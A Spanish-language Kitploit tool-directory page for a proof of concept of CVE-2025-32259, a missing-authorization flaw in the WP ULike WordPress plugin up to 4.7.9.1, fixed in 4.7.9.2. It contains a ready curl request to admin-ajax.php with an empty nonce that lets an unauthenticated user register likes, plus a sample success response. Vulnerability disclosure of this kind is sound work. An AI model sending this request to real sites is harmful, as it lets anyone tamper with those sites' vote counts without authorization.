Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wp-ulike-cve-2025-32259-poc — En las versiones afectadas del complemento WP ULike, no hay una verificación de autorización adecuada antes de permitir ciertas acciones AJAX o manipulaciones de votos. Esto permite que usuarios no autenticados interactúen con el complemento de formas que solo los usuarios registrados deberían poder hacerlo, lo que podría sesgar votos o inyectar datos engañosos. | Kitploit
Herramientas/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

hace 1 añoAún no revisado

En las versiones afectadas del complemento WP ULike, no hay una verificación de autorización adecuada antes de permitir ciertas acciones AJAX o manipulaciones de votos. Esto permite que usuarios no autenticados interactúen con el complemento de formas que solo los usuarios registrados deberían poder hacerlo, lo que podría sesgar votos o inyectar datos engañosos.

Compartir

WP ULike ≤ 4.7.9.1 - Suplantación de Contenido sin Autenticación (CVE-2025-32259)

🔬 Un PoC simple que demuestra CVE-2025-32259 en el plugin WP ULike para WordPress.
🚨 Solo uso educativo – no probar en sistemas sin autorización explícita.


🧠 Resumen

WP ULike es un popular plugin de WordPress que permite a los usuarios dar 'me gusta' a contenido en un sitio. Las versiones hasta la 4.7.9.1 sufren de una vulnerabilidad de falta de autorización, que permite a usuarios no autenticados suplantar acciones de 'me gusta' a través de peticiones AJAX.

  • CVE: CVE-2025-32259
  • Versiones Vulnerables: ≤ 4.7.9.1
  • Versión Corregida: 4.7.9.2

🚀 Prueba de Concepto

La vulnerabilidad permite a usuarios no autenticados interactuar con el endpoint AJAX y dar 'me gusta' a cualquier contenido (publicación, comentario, etc.) sin permiso.

🔧 Script PoC

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Reemplace id=1 con un ID de publicación válido.

Una respuesta exitosa podría verse así: {"status":"success","msg":"You liked this."}

Descargar herramienta